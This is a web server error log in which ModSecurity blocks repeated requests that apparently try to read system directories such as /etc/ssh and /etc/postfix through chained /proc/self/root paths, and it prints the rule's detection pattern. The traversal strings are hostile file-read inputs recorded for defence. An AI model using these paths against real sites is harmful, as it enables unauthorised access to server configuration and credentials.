[Fri Mar 20 12:21:59.637646 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:35204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mF_HIg5MgXLBnicMs-gAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:22:23.896661 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.241.31:57828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mLzJ3M9BSuKP7CAZiegAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:22:25.609652 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:57836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mMTJ3M9BSuKP7CAZifwAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:22:30.000711 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.70:56200] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1mNTJ3M9BSuKP7CAZihwAAAIY"]
[Fri Mar 20 12:22:35.335224 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.103:56570] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1mOzJ3M9BSuKP7CAZikwAAAJA"]
[Fri Mar 20 12:22:54.834961 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.113:57352] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1mTuoXxyEfFpUF8f-4fQAAAUo"]
[Fri Mar 20 12:23:10.080698 2026] [mime_magic:error] [pid 31215:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:57904] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:23:28.079043 2026] [:error] [pid 11167:tid 140411599251200] [client 57.141.18.51:58578] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1mcPHIg5MgXLBnicMtRQAAAdE"]
[Fri Mar 20 12:23:28.435222 2026] [:error] [pid 9818:tid 140411666392832] [client 57.141.18.13:58538] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1mcF1pVZ5mVmJwsFNnHgAAAEk"]
[Fri Mar 20 12:23:29.873913 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.11:58688] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1mcRCii7xarUs8iHajqAAAAhU"]
[Fri Mar 20 12:23:52.354370 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:47810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1miPXLqtnMIWvjpaLWEgAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:24:36.986896 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.228.61:41762] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1mtPqxLDW4GITHUkQj-AAAAQ4"]
[Fri Mar 20 12:24:45.343948 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.41:60978] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1mveoXxyEfFpUF8f-4-wAAAUQ"]
[Fri Mar 20 12:24:46.079385 2026] [mime_magic:error] [pid 11642:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:32792] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:24:46.081411 2026] [mime_magic:error] [pid 7235:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:32790] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:24:49.584553 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:36770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1mwOoXxyEfFpUF8f-5AgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:04.179644 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:35084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m0F1pVZ5mVmJwsFNnSwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:16.947643 2026] [mime_magic:error] [pid 7893:tid 140411632822016] (70014)End of file found: [client 57.141.18.73:33802] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:25:17.783817 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.81:33830] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1m3da6ubjKNq_cu4YWUgAAA1U"]
[Fri Mar 20 12:25:30.222572 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:60914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m6ta6ubjKNq_cu4YWXgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:31.675197 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.241.31:38560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m611pVZ5mVmJwsFNnZwAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:33.123385 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.241.31:38560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m611pVZ5mVmJwsFNnaAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:34.618940 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:38576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m7l1pVZ5mVmJwsFNnawAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:35.969451 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.241.31:38590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m7_HIg5MgXLBnicMtjwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:37.787690 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:43520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m8QF0L0L-SsrnPo6hEwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:40.153239 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:43530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m9PqxLDW4GITHUkQkIwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:43.061522 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.241.31:43544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m9_HIg5MgXLBnicMtmgAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
